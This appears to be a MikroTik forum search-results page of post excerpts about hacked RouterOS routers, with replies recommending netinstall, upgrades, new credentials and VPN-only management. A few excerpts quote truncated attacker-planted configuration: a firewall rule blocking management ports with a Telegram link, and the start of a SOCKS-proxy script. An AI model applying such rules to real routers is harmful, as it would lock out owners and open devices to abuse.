i have a crs 326 24g 2s when i went to hard reset it not working . so i opened my crs board to hard reset with metal object but i cant find it on board of crs 326. please help me ..{ crs 326 hacked yesterday and in hacked scripte wrote silent reset }
Thank you ALL

by anav
Wed Jun 12, 2019 11:23 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

... first we dont know what firmware he had to begin with so its an assumption not fact if his firmware is or is not up to date. Secondly, if there is hacked firmware the only 'safe' method for an update or reset is to dowload a clean copy of the latest firmware and apply it via netinstall!! As to ...
by craigreilly
Wed Jun 12, 2019 8:37 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

change the username too...
by krafg
Wed Jun 12, 2019 7:42 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Re: Hacked recently [SOLVED]

Update your ROS to latest version and change admin password.

Regards.
by lscjablonec
Mon Jun 10, 2019 1:43 pm
Forum: Beginner Basics
Topic: Block IP adress trying to access RDP
Replies: 10
Views: 2558

Re: Block IP adress trying to access RDP

Think about VPN and not limiting ....... From Outside direct avaible Services will be Hacked in some case Look at winbox hack Look to ubnt Look were you want, direct exposed Services are an invitation the only was to do Secure this, is yousing a VPN I am using VPN ...
by darkuek
Mon Jun 10, 2019 12:39 pm
Forum: Beginner Basics
Topic: Hacked recently [SOLVED]
Replies: 7
Views: 1769

Hacked recently [SOLVED]

Hello, some of my accounts got hacked i start enabling 2FA. i wonder if my Forwarding played a role and if the hacker could access my router and bridge settings and edit/add rules.
Ports 0-65535 TCP and UDP

Best regards.
by mistry7
Sat Jun 08, 2019 5:25 am
Forum: Beginner Basics
Topic: Block IP adress trying to access RDP
Replies: 10
Views: 2558

Re: Block IP adress trying to access RDP

Think about VPN and not limiting .......
From Outside direct avaible Services will be Hacked in some case

Look at winbox hack
Look to ubnt
Look were you want, direct exposed Services are an invitation
the only was to do Secure this, is yousing a VPN
by Jotne
Mon Jun 03, 2019 11:50 pm
Forum: General
Topic: Webfig remote access from WAN
Replies: 18
Views: 14418

Re: Webfig remote access from WAN

... link directly to your router (preferably VPN)? It will know everything going on at your site, copy of configuration ++ What happens if Cloutik get hacked? Could some get inn to all routers Cloutik handles? Link to company https://www.cloutik.com/
by AlainCasault
Tue May 28, 2019 6:12 pm
Forum: General
Topic: How to create group of address lists?
Replies: 7
Views: 3402

Re: How to create group of address lists?

I like your plan. a. there are no hackers in france and germany (FACT) b. there are no computers in france and germany that can be hacked and controlled by Bots (FACT) c. allowing access to winbox by external IPs is very safe (FACT). FACT Foundation for the Advancement of Cardiac Therapies, ...
by anav
Tue May 28, 2019 5:31 pm
Forum: General
Topic: How to create group of address lists?
Replies: 7
Views: 3402

Re: How to create group of address lists?

I like your plan. a. there are no hackers in france and germany (FACT) b. there are no computers in france and germany that can be hacked and controlled by Bots (FACT) c. allowing access to winbox by external IPs is very safe (FACT). FACT Foundation for the Advancement of Cardiac Therapies, ...
by Kindis
Fri May 24, 2019 2:36 pm
Forum: General
Topic: cpu 100% internet disconnections
Replies: 3
Views: 694

Re: cpu 100% internet disconnections

... and upgrade to 6.43.16 If the issue still continues I would export config, read though so there is nothing strange in the config (you have been hacked or so on), netinstall the device and import clean config. If the issue still persists then you might need to dig deeper into it. I think it will ...
by anthonws
Mon May 13, 2019 1:19 pm
Forum: General
Topic: [Feature request] Wireguard
Replies: 143
Views: 46042

Re: [Feature request] Wireguard

... miserable because they can now run new-gen VPNs... After a while a new feeling hit them! They are now missing their dearly PPTP and OpenVPN (not a hacked version from Ubiquiti of course!)... They even started a PPTP + OpenVPN movement! "Make PPTP & OpenVPN Great Again!" /S
by helmonder
Tue May 07, 2019 7:19 pm
Forum: General
Topic: RB2011UiAS-2HnD-IN replacement
Replies: 6
Views: 883

RB2011UiAS-2HnD-IN replacement

... years I have set it up with queueing, incomming and outgoing VPN, I am routing my IPTV through it in a seperate VLAN, etc. etc. Basically I have hacked this thing to fit as a glove. I am now looking for a replacement system that will not only give me 2.4Ghz but also 5Ghz and also includes an ...
by pe1chl
Tue May 07, 2019 5:32 pm
Forum: General
Topic: device unreachable
Replies: 1
Views: 376

Re: device unreachable

You sure dare to run old sofware... maybe without firewall too? So it has been hacked now?
What happens after powercycle? I presume it immediately is unreachable?
Unfortunately with MikroTIk (contrary to some other manufacturer) there is no "remote reset button" on the power inserter...
by vlad2606
Sat Apr 20, 2019 1:39 pm
Forum: Beginner Basics
Topic: no ping from lan to wan and router to wan
Replies: 2
Views: 469

no ping from lan to wan and router to wan

... from lan to wan and from router itself to wan. Internet is working ok. Ping from lan to bridge is ok. Could it be the result of the router being hacked so i remove all the changes than upgraded the firmware? What to do now ? use netinstall and clean all memory and make all setting once again?
by Poshatskiy
Fri Apr 19, 2019 9:01 am
Forum: General
Topic: RB952 has been hacked
Replies: 0
Views: 360

RB952 has been hacked

Hi there! Yesterday one of my routers has been hacked during initial tuning process. Now I'm aware of the mistakes of tuning process while being connected to the Web. So do not throw stone at me, please. Any advice will be welcome and appreciated. ...
by Jotne
Thu Apr 18, 2019 10:14 am
Forum: General
Topic: Attack on the router?
Replies: 1
Views: 534

Re: Attack on the router?

Have you ever opened for administration (using Winbox) from the internet?
If so it may be that you have been hacked.
Do a net install with latest fixed ros, and do a search for how to secure remote admin.
Example, use VPN etc.
by radionerd
Sun Apr 14, 2019 12:50 am
Forum: General
Topic: [Question] My backup size is 3626.6 KiB ! isn't huge ?
Replies: 23
Views: 5083

Re: [Question] My backup size is 3626.6 KiB ! isn't huge ?

Old thread, same question. My consentrator (RB1100AHx2) was hacked about 6 months ago. It was performing DDoS attacks on Federal IP's ;-( I am 600 Miles away from it. I was able to remotely regain control and get it updated six months ago. Now on 6.44.2, ...
by Paternot
Tue Apr 09, 2019 2:39 pm
Forum: General
Topic: Can't backup
Replies: 9
Views: 1255

Re: Can't backup

1) Take a backup. Just because. ... and then junk it. If the device was hacked, this backup should never ever be restored by any chance. If device was not hacked ... you'll have it up and running with revised configuration anyways. Never underestimate Murphy's ...
by mkx
Tue Apr 09, 2019 9:23 am
Forum: General
Topic: Can't backup
Replies: 9
Views: 1255

Re: Can't backup

1) Take a backup. Just because.
... and then junk it. If the device was hacked, this backup should never ever be restored by any chance. If device was not hacked ... you'll have it up and running with revised configuration anyways.
by ElTRiC
Tue Apr 02, 2019 7:11 pm
Forum: Beginner Basics
Topic: Force local IP to use specific wan on load balancing
Replies: 15
Views: 2437

Re: Force local IP to use specific wan on load balancing

... mikrotik I fear to spend a lot of time and break other rules which are finally working now. Ofc I'm monitoring my router closely, it was already hacked within a day when I started to set it up without password :shock:
by enzain
Fri Mar 29, 2019 11:25 pm
Forum: General
Topic: Very strange environment variables. Did I get hacked?
Replies: 19
Views: 6529

Re: Very strange environment variables. Did I get hacked?

Any news?
I have some variables on CHR 6.44.1
by anav
Wed Mar 27, 2019 5:32 pm
Forum: General
Topic: Port forwarding to two pcs for RDP
Replies: 12
Views: 2960

Re: Port forwarding to two pcs for RDP

... are allowed access you can add a source address list to the NAT rules and then those ports would not be visible on scans. Regardless RDP is a much hacked service and it would be far better to have those folks VPN into your router and then RDP to the server. Example B. Here, I assume that you want ...
by Kindis
Fri Mar 22, 2019 9:10 am
Forum: General
Topic: Cloud Backup
Replies: 21
Views: 6322

Re: Cloud Backup

... that then send the backup offsite. The reason is that the ISP I have thinks the backup generated e-mail where a sign that my SMTP account had been hacked and changed the password all the time. Here are both script. I which I could say that I'm smart enough to take credit for these but I'm not :-) ...
by 2frogs
Fri Mar 22, 2019 6:30 am
Forum: Beginner Basics
Topic: Can't connect to web interface internal
Replies: 10
Views: 3873

Re: Can't connect to web interface internal

... http://t.me/router_os" dst-port=\ 8778,8728,8729,22,23,80,443,8291 protocol=tcp src-address-list=!allow-ip This indicates your router has been hacked! I would recommend doing a netinstall to remove all bad configs, upgrade to latest ROS, do not reuse old passwords and make sure you have a secure ...
by anav
Fri Mar 22, 2019 2:38 am
Forum: General
Topic: Attempt of attacks through Remote Desktop [SOLVED]
Replies: 6
Views: 1563

Re: Attempt of attacks through Remote Desktop [SOLVED]

... Then log in with that. Patches were released in May 2018. Since then, I've left a test VM exposed to the internet and so far it hasn't been hacked. But due to the disappointing track record, I would NOT trust RDP. Some Options: - Port Knock. Set a firewall rule that when you try to connect ...
by Van9018
Fri Mar 22, 2019 1:37 am
Forum: General
Topic: Attempt of attacks through Remote Desktop [SOLVED]
Replies: 6
Views: 1563

Re: Attempt of attacks through Remote Desktop [SOLVED]

... Then log in with that. Patches were released in May 2018. Since then, I've left a test VM exposed to the internet and so far it hasn't been hacked. But due to the disappointing track record, I would NOT trust RDP. Some Options: - Port Knock. Set a firewall rule that when you try to connect ...
by plisken
Mon Mar 18, 2019 11:28 pm
Forum: Scripting
Topic: Solved Script to recreate the load balance mangle rules
Replies: 12
Views: 19832

Re: Solved Script to recreate the load balance mangle rules

... This is what I mean. If I send a supout.rif to Mikrotik they are very vague and give no concrete solution. What do you mean with my account hacked. My Mikrotik account or forum account? Greatings
by anav
Sat Mar 09, 2019 8:26 pm
Forum: General
Topic: How to reach RouterOs (web or Winbox) via my static ip address from outside network
Replies: 24
Views: 2307

Re: How to reach RouterOs (web or Winbox) via my static ip address from outside network

Hahaha Not quite right, change it to this.......... and bend to my will!!
"Many many RouterOs have been hacked due to weaknesses in older RouterOS software, that were exploited when admins failed to configure their routers in a secure manner.
by anav
Sat Mar 09, 2019 2:35 pm
Forum: General
Topic: How to reach RouterOs (web or Winbox) via my static ip address from outside network
Replies: 24
Views: 2307

Re: How to reach RouterOs (web or Winbox) via my static ip address from outside network

... signature on how to use Splunk with Mikrotik RouterOS 6. Do think once again if you really need the Winbox port open Many many RouterOs has been hacked doe to weakness in the RouterOS software. Hi Sob, sorry mate, I call it as I see it. I am no politician, its the same person that will come back ...
by Jotne
Sat Mar 09, 2019 8:40 am
Forum: General
Topic: How to reach RouterOs (web or Winbox) via my static ip address from outside network
Replies: 24
Views: 2307

Re: How to reach RouterOs (web or Winbox) via my static ip address from outside network

... signature on how to use Splunk with Mikrotik RouterOS 6. Do think once again if you really need the Winbox port open Many many RouterOs has been hacked due to weakness in older RouterOS software.
by cypriotxx
Wed Mar 06, 2019 4:52 pm
Forum: General
Topic: creating 3 isolated network for VM machines
Replies: 5
Views: 477

creating 3 isolated network for VM machines

... to use this router to run 3 different VMachine running web servers on my network that will have no access to my local network even if they are got hacked etc whats the best way forward to achieve something like this please ?
by MasterJames
Tue Mar 05, 2019 10:41 am
Forum: General
Topic: DHCPv6 Prefix Request Response not happening. How to Trace Debug?
Replies: 9
Views: 1435

DHCPv6 Prefix Request Response not happening. How to Trace Debug?

... from the PRovider, with their (telus) modem set to bypass directly all control to this MikroTik router. [It's been working great although it was hacked last year with the Socks turned out and Proxy mode enabled the warning of that was NetFlix was blocked.] So I could easily do all the settings ...
by anav
Sun Mar 03, 2019 11:52 pm
Forum: General
Topic: RouterOS making unaccounted outbound winbox connections [SOLVED]
Replies: 65
Views: 61978

Re: RouterOS making unaccounted outbound winbox connections [SOLVED]

... You cannot remove this sheite by simple means. Stop, dont check anything, dont waste your time........... The only approved method once infected/hacked is to use netinstall with a fresh install of the latest firmware and start from scratch.
by anav
Thu Feb 28, 2019 10:10 pm
Forum: Beginner Basics
Topic: allow wifi only local network
Replies: 5
Views: 962

Re: allow wifi only local network

... practices have a global affect that is positive. For example in both cases the wifi connections cannot get to the net and less likely to be hacked in that way. However the wifi devices through USB or their own cellular email connections or browsing can still get infected and in my scenario ...
by anav
Thu Feb 28, 2019 2:57 pm
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

If you cannot use netinstall then there are no guarantees for a hacked unit, regardless of what half measures you take.
by a575606
Wed Feb 27, 2019 9:25 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 377
Views: 98786

Re: RB4011

... admin user is disabled and I'm logged in using a new custom user with admin privileges. It always points to my lan ip, so it's not like I'm being hacked... At first I thought I have a setting wrong, or that a browser plugin was interfering. But I switched to winbox and notice it happened again. ...
by jacinto
Wed Feb 27, 2019 7:35 pm
Forum: General
Topic: Problem RB1100AHx4
Replies: 1
Views: 393

Problem RB1100AHx4

I can not reset the RB1100AHx4 factory. It has been hacked and I want to format it to get the settings right again
by anav
Tue Feb 26, 2019 2:47 pm
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

... you mean by updated................. if one simply updated to the lastest firmware via a standard update then the router is still most likely in a hacked state. As per clear instruction one should use netinstall for a completely clean restart (and not use any backup files either that may be contaminated).
by Kurosudo
Tue Feb 26, 2019 2:34 pm
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

I found this "malware" too in one of my customers RB. Routerboard was updated and management ports was blocked to internet. But they had hacked CCTV system.
by WildWest
Sat Feb 23, 2019 1:02 am
Forum: General
Topic: Why Mikrotik does not encrypt the password in RouterOS?
Replies: 1
Views: 813

Why Mikrotik does not encrypt the password in RouterOS?

As you remember in 2018 a lot of Mikrotik's were hacked using vulnerability through the Winbox and port 80. Since v6.42.1 (stable) Mikkrotik had closed that vulnerability. But what I did, I think other people had found it as well: For example, in ...
by anav
Fri Feb 22, 2019 5:14 pm
Forum: General
Topic: Security issue when Winbox exposed
Replies: 68
Views: 10337

Re: Security issue when Winbox exposed

... are inspired to include cyber defense in their protocols and processes. Each code block should have passed some level of scrutiny, can this be hacked, how can it be hacked how do we prevent it, etc..... I am much more interested in the improvement process in response to such events. :-)
by pe1chl
Fri Feb 22, 2019 10:49 am
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

... was open to API, telnet, winbox etc from the internet. That presumably was the case. Or there was some system on your local network that was hacked and from there connections to your router were possible. If not one of those, the step of picking a password is not reached.
by mozerd
Thu Feb 21, 2019 6:10 pm
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

... trained techs.that are very good in copy past procedure without understanding the implications in any way.--- Its no wonder that so many get hacked.
by vecernik87
Thu Feb 21, 2019 12:06 pm
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

There was a version 6.42.5
vs
It is confirmed that this was another case of hacked router due to a insecure firewall configuration in combination with old RouterOS version


these two statements seems mutually exclusive.. how is that possible?
by strods
Thu Feb 21, 2019 8:25 am
Forum: General
Topic: Unauthorized access to MikroTiK
Replies: 20
Views: 4125

Re: Unauthorized access to MikroTiK

It is confirmed that this was another case of hacked router due to a insecure firewall configuration in combination with old RouterOS version (one which is vulnerable due to a Winbox related problem):

https://blog.mikrotik.com/security/winb ... ility.html
by gutekpl
Wed Feb 20, 2019 7:19 pm
Forum: General
Topic: Three vlans at home on MT hap ac2 - best practice?
Replies: 20
Views: 2128

Three vlans at home on MT hap ac2 - best practice?

... of them already and will multiply that amount shortly. Security on those things is as it is, I dont want to wake up one day and notice that somene hacked my light switch and accessed whole network via SMB and deleted half of that stuff, etc. It could have been probably filtered in Firewall somehow, ...
by joegoldman
Sat Feb 16, 2019 5:10 am
Forum: General
Topic: mikrotik wrong username or password
Replies: 5
Views: 2095

Re: mikrotik wrong username or password

Was it old RouterOS version? If so its likely been hacked. Good news is, being old version you can use the same hack to re-gain access - but once its been compromised you should take config export, make sure no bad config is in there, and do a fresh net-install.
by mkx
Thu Feb 14, 2019 10:22 pm
Forum: General
Topic: AVOIDING VLAN1 ON BRIDGE????
Replies: 36
Views: 3851

Re: AVOIDING VLAN1 ON BRIDGE????

... its that your data is on the cloud and if hacked then folks may be able to reach your equipment through the net ... You're making a very important point here. And it's not only control over your gadgets, equaly important is your data stored ...
by anav
Thu Feb 14, 2019 9:08 pm
Forum: General
Topic: AVOIDING VLAN1 ON BRIDGE????
Replies: 36
Views: 3851

Re: AVOIDING VLAN1 ON BRIDGE????

... Its not the companies themselves that concern me, (besides the disgruntled employee syndrome) its that your data is on the cloud and if hacked then folks may be able to reach your equipment through the net and with that reach and access, they are apt to branch out........ If on a VLAN ...
by mkx
Thu Feb 14, 2019 7:51 pm
Forum: General
Topic: AVOIDING VLAN1 ON BRIDGE????
Replies: 36
Views: 3851

Re: AVOIDING VLAN1 ON BRIDGE????

... and the plain white ones their own VLAN? Or should I group them to VLANs according to rooms? Do I put switches to separate VLAN so if they get hacked light bulbs won't switch on and off as some Nigerian guy sees fit? Sorry, couldn't help myself ...
by anav
Thu Feb 14, 2019 7:27 pm
Forum: General
Topic: AVOIDING VLAN1 ON BRIDGE????
Replies: 36
Views: 3851

Re: AVOIDING VLAN1 ON BRIDGE????

... my door status (locked or unlocked) or associated live video feed. My switch was a $xxx dollar investment, I dont want a box for whatever reason hacked to be able to access my switch and EFF IT UP. I think you get my drift!!!! (privacy of information, protection of hardware etc etc) What are ...
by BartoszP
Thu Feb 14, 2019 2:02 pm
Forum: General
Topic: Guide to (possibly) hack RouterOS ... If yes please protect it
Replies: 10
Views: 3231

Re: Guide to (possibly) hack RouterOS ... If yes please protect it

Most users who start threads "Mikrotik hacked...", "My router is unsecured", "Big hole in security of ..." seems to not check forum for security topics Did you try easiest method to look for security problems: https://forum.mikrotik.com/search.php?keywords=vulnerability ...
by Redmor
Mon Feb 11, 2019 10:44 pm
Forum: General
Topic: ROS v6.43.x Hacked using same old vulnerability
Replies: 2
Views: 1200

Re: ROS v6.43.x Hacked using same old vulnerability

Destroy RB and buy a new one.
by R1CH
Mon Feb 11, 2019 1:05 pm
Forum: General
Topic: ROS v6.43.x Hacked using same old vulnerability
Replies: 2
Views: 1200

Re: ROS v6.43.x Hacked using same old vulnerability

Netinstall the latest version with known clean config and change all passwords. Either you didn't change passwords or you didn't netinstall, so attackers were able to get back onto your device.
by hsabrey
Mon Feb 11, 2019 12:46 pm
Forum: General
Topic: ROS v6.43.x Hacked using same old vulnerability
Replies: 2
Views: 1200

ROS v6.43.x Hacked using same old vulnerability

hello today i found my RB2011 been compromised using the same vulnerability and here is the photo attached. this time they fitch a file from the internet which i do not what it is? mean time the version is v6.43.7 the script added a file in the mikrotik and this it's content /ip socks access add src...
by nichky
Sat Feb 09, 2019 6:42 am
Forum: General
Topic: l2tp/ipsec problem
Replies: 5
Views: 1097

Re: l2tp/ipsec problem

... certificates? It's just a message. That features comes with the new version several versions ago. Just reminding you that pre shared key can be hacked. Thank you
by mkx
Fri Feb 08, 2019 10:00 pm
Forum: Beginner Basics
Topic: Out of Box settings on RB2011
Replies: 2
Views: 458

Re: Out of Box settings on RB2011

... or newer) and you see around 10 firewall filter rules (as opposed to none), then you're quite fine to go online. Assuming that the device wasn't hacked before and that you didn't disable or reorder firewall rules ...
by anav
Tue Feb 05, 2019 3:27 pm
Forum: General
Topic: MOAB mother of all blacklists
Replies: 88
Views: 15743

Re: MOAB mother of all blacklists

... makes them happy? He is merely offering a service that he ALREADY provides for his clients doing what he thinks is best to keep them from getting hacked. He doesn't need anybody from this forum to use the service. If you think $60 bucks a year is too much, then don't use it. I spend more money ...
by mkx
Mon Jan 28, 2019 9:08 am
Forum: General
Topic: IP Socks causes 100%cpu
Replies: 2
Views: 819

Re: IP Socks causes 100%cpu

I'm afraid that only sure way to clean malware from hacked routerboard is to perform netinstall ... for that physical access is a must. And, after you do it, don't restore configuration from backup, malware might be hidden in it. Rather re-do configuration ...
by tiji2012
Sun Jan 27, 2019 2:44 am
Forum: General
Topic: crs3xxx impossible to reset.
Replies: 0
Views: 383

crs3xxx impossible to reset.

Hello everyone, my name is Matias and im from Argentina, so apologize for my gramatical. I just got a problem with my Crs368, it got hacked and blocked totally, i cant entry with Swos or RouterOS. I tried with NetInstall, but the crs3xxx version doesnt has NPK archives, just BIN archives, ...
by Redmor
Wed Jan 23, 2019 5:27 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

1) I ALWAYS said that this hacked RB, even if behind dst-nat, has got the firewall that I've posted, so it isn't opened to the internet, access is restricted. 2) I don't use default username admin 3) I don't use backup files or exports ...
by anav
Wed Jan 23, 2019 4:52 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

... major problems with many of the MT reported hacks. If the admin does not secure access to the router internally and a device behind the router is hacked due to phishing, going to unsafe sites etc, then the router could be vulnerable from the inside but I am not sure how that happens. There are ...
by Redmor
Wed Jan 23, 2019 3:39 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

... 1) I set the firewall on the public interface 2) The device has got the firewall I've posted, even if it's behind NAT. 3) I've found other RBs hacked, after removing all unusual config and updated they have been hacked again. In all cases, I have this firewall, it's very similar to defconf ...
by normis
Wed Jan 23, 2019 8:27 am
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

1) Defconf protects only the public interface.
2) Defconf doesn't protect device from within. If you were hacked a year ago, cleared the config but left one script in the device, it could have reconfigured itself even after you installed a better firewall and upgraded.
by Redmor
Tue Jan 22, 2019 9:48 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

Anav ... should mrz explain again and again and step by step what to do when you are hacked or could expect that autor is aware of https://blog.mikrotik.com/ "Regardless of version used, all RouterOS versions that have the default firewall enabled, are not vulnerable" ...
by Redmor
Tue Jan 22, 2019 9:43 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

... are sure that after first hack you reinstalled the route rand changed login credentials, then contact support. There are cases that routers get "hacked" even after upgrade, because already stolen credentials was not changed. mrz, are you sure you are MT support LOL. From all my simple readings, ...
by Redmor
Tue Jan 22, 2019 9:41 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

... HELP. Why would you leave WInbox open to the internet? Did you at least use Port Knocking techniques? Why was access not via VPN. Was the router hacked previously and not reconfigured via netinstall?? 1. Winbox isn't open to the Internet, I have a firewall that accepts only connections from my ...
by anav
Tue Jan 22, 2019 5:26 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

Concur Bartoz, of course the OP should have his ....... ......... whacked for not using netinstall after being hacked in the past. This has been documented on almost every thread on the subject and in the blog and and and and and............................ ...
by mrz
Tue Jan 22, 2019 5:25 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

... are sure that after first hack you reinstalled the route rand changed login credentials, then contact support. There are cases that routers get "hacked" even after upgrade, because already stolen credentials was not changed. mrz, are you sure you are MT support LOL. From all my simple readings, ...
by BartoszP
Tue Jan 22, 2019 5:06 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

Anav ... should mrz explain again and again and step by step what to do when you are hacked or could expect that autor is aware of https://blog.mikrotik.com/
by anav
Tue Jan 22, 2019 5:04 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

... HELP. Why would you leave WInbox open to the internet? Did you at least use Port Knocking techniques? Why was access not via VPN. Was the router hacked previously and not reconfigured via netinstall?? 1. Winbox isn't open to the Internet, I have a firewall that accepts only connections from my ...
by anav
Tue Jan 22, 2019 5:00 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

... are sure that after first hack you reinstalled the route rand changed login credentials, then contact support. There are cases that routers get "hacked" even after upgrade, because already stolen credentials was not changed. mrz, are you sure you are MT support LOL. From all my simple readings, ...
by mrz
Tue Jan 22, 2019 4:03 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability or hack?

Currently there is no new known winbox port vulnerabilities.
If you are sure that after first hack you reinstalled the router rand changed login credentials, then contact support.
There are cases that routers get "hacked" even after upgrade, because already stolen credentials was not changed.
by Redmor
Tue Jan 22, 2019 3:37 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

... HELP. Why would you leave WInbox open to the internet? Did you at least use Port Knocking techniques? Why was access not via VPN. Was the router hacked previously and not reconfigured via netinstall?? 1. Winbox isn't open to the Internet, I have a firewall that accepts only connections from my ...
by Redmor
Tue Jan 22, 2019 3:31 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

... the RB hasn't got a public IP, plus it has a firewall that should drop everything and accept only 8291 connections from address list. How can I be hacked? For God's sake, one port opened, with firewall, it's obviously a vulnerability. Router has been hacked using a vulnerability before 6.43.8, ...
by anav
Tue Jan 22, 2019 2:34 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

... HELP. Why would you leave WInbox open to the internet? Did you at least use Port Knocking techniques? Why was access not via VPN. Was the router hacked previously and not reconfigured via netinstall??
by Arcee
Tue Jan 22, 2019 2:15 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

You should really rename this thread to "I have been hacked" and try to figure out what you did wrong in the configuration.

Why have winbox open to the world?

Sent from my Pixel 2 using Tapatalk


by eddieb
Tue Jan 22, 2019 2:08 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 10783

Re: 6.43.8 vulnerability

Perhaps you should not use the word vulnerability until it is confirmed ...
Until now you can only name it "hacked" ...
And the reason for that is not clear

ps,
send email to support@mikrotik.com for help, this is a user forum, not a support forum
by mkx
Sun Jan 20, 2019 7:10 pm
Forum: General
Topic: Unable to reach a hand full of web sites...
Replies: 2
Views: 458

Re: Unable to reach a hand full of web sites...

Depending on ROS version and original FW config it is quite possible that your router got hacked. Export current config to text file (/export file=config.txt), save that file to your computer. Then netinstall the router (google for exact procedure) and start configuring ...